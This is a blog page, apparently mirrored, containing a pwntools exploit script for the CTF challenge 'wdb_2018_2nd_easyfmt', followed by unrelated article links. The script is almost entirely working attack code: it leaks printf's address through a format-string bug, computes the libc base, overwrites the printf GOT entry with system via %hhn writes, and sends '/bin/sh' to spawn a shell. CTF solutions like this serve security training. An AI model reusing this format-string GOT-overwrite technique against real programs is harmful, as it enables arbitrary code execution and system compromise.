zoukankan      html  css  js  c++  java
  • wdb_2018_2nd_easyfmt

    exp

    from pwn import *
    
    context.log_level = 'debug'
    p = process('./wdb_2018_2nd_easyfmt')
    #p = process('./idaidg/linux_server')
    #p = remote('node3.buuoj.cn',29254)
    elf = ELF('./wdb_2018_2nd_easyfmt')
    libc = elf.libc
    #libc = ELF('./libc/libc-2.23x86.so')
    
    p.recvuntil('Do you know repeater?')
        
    p.send(p32(0x804A014) + '%6$s')
    p.recv()
    #sleep(1)
    printf = p.recvuntil('xf7')[-4:]
    printf_addr = u32(printf)
    print 'printf_addr:' + hex(printf_addr)
    
    libcbase = printf_addr - libc.symbols['printf']
    
    print"libcbase:"+ hex(libcbase)
    
    #gdb.attach(p)
    
    system = libcbase + libc.symbols['system']
    
    print"system:"+hex(system)
    
    a1 = system % (16*16)
    a2 = (system / (16*16))%(16*16)
    a3 = (system / (16*16*16*16))%(16*16)
    a4 = (system / (16*16*16*16*16*16))%(16*16)
    
    print"a1,a2,a3,a4:"+hex(a1)+','+hex(a2)+','+hex(a3)+','+hex(a4)
    payload1 = fmtstr_payload(6,{0x804A014:system})
    
    payload = p32(0x804A014)
    payload += p32(0x804A014 + 1)
    payload += p32(0x804A014 + 2)
    payload += p32(0x804A014 + 3)
    payload += '%'
    payload += str(a1 - 16)
    payload += 'c%6$hhn'
    payload += '%'
    payload += str((0x100+a2) - a1)
    payload += 'c%7$hhn'
    payload += '%'
    payload += str((0x100+a3) - a2)
    payload += 'c%8$hhn'
    payload += '%'
    payload += str((0x100+a4) - a3)
    payload += 'c%9$hhn'
    
    sleep(1)
    
    p.send(payload1)
    
    sleep(1)
    p.send('/bin/shx00')
    
    p.interactive()
    
    
  • 相关阅读:
    Oracle 删除某个用户下的对象
    解决11g导出时,空表不能导出问题
    Oracle常用sql
    Oracle 创建表空间和用户
    chapter4.1、函数,参数
    chapter3.6、标准库datetime
    chapter3.5内建函数
    简单选择排序和二元选择排序
    chapter3.4解析式、生成器
    列表解析练习
  • 原文地址:https://www.cnblogs.com/luoleqi/p/13498183.html
Copyright © 2011-2022 走看看